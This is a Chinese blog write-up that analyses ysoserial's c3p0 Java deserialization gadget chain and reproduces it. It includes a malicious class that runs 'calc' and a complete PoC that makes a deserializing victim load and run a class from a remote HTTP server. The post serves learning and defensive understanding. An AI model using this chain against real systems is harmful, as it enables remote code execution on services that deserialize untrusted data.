分析

首先是阅读神器ysoserial是怎样调用c3p0https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/C3P0.java

1
2
3
PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
return b;

创建了com.mchange.v2.c3p0.PoolBackedDataSource,并把connectionPoolDataSource属性设置为PoolSource类 从代码中可以发现,connectionPoolDataSource存在于PoolBackedDataSourceBase

image.png

于是分析该类是如何实现writeObjectreadObject

image.png

尝试将connectionPoolDataSource属性转成byte数组,但是因为这个属性被赋值为PoolSource类,而且PoolSource没有继承Serializable接口,所以会进入错误处理,调用箭头所指的函数

image.png

获取var1Reference对象,经过ReferenceIndirector.ReferenceSerialized包装后返回

因为用到了Referenceable接口的函数,所以PoolSource要同时实现ConnectionPoolDataSourceReferenceable

writeObject的操作就是这样,接下来看看readObject

image.png

因为PoolSource经过了ReferenceIndirector.indirectForm的处理,返回的类型是IndirectlySerialized,所以会调用ReferenceIndirector.getObject()。为什么不会进其他case,因为这里就一个case

image.png

继续跟进ReferenceableUtils.referenceToObject()

image.png

可以发现URLClassLoader构造了一个从远程加载类的加载器,并且使用Class.forName来利用这个加载器从远程加载这个类。并且参数var4var8var11都是来自var0,为ReferenceSerialized中的this.reference。这个reference最初是由ReferenceIndirector.indirectForm中,var1调用getReference获得,也就是说来自PoolSource

回到ysoserial的PoolSource

image.png

实现了恶意的getReference,所以就能控制传进ReferenceableUtils.referenceToObject()的参数var0,也就是能够从远程地址加载恶意类了

复现

ysoserial的构造方法有点高级,为了学习,我不用ysoserial的构造payload的方法 首先编译一个恶意类,放到web目录下

1
2
3
4
5
6
7
8
9
public class Exploit {
	public Exploit(){
		try {
			Runtime.getRuntime().exec("calc");
		} catch (Exception e) {
		}

	}
}

然后构造payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import java.io.*;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;

public class Test {

    public static void main(String []args) throws Exception {
        PoolBackedDataSource p = new PoolBackedDataSource();
        p.setConnectionPoolDataSource(new PoolSource("Exploit", "http://127.0.0.1:8080/"));

        // serialize
        FileOutputStream fos=new FileOutputStream("object");
        ObjectOutputStream os=new ObjectOutputStream(fos);
        os.writeObject(p);
        os.close();

        FileInputStream fis=new FileInputStream("object");
        ObjectInputStream ois=new ObjectInputStream(fis);
        // deserialize
        String obj2=(String)ois.readObject();
        System.out.println(obj2);
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            return new Reference("exploit", this.className, this.url);
        }
        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }
}

运行后就能执行calc,弹出计算器

image.png

参考

https://blog.csdn.net/fnmsd/article/details/88959428 https://paper.seebug.org/312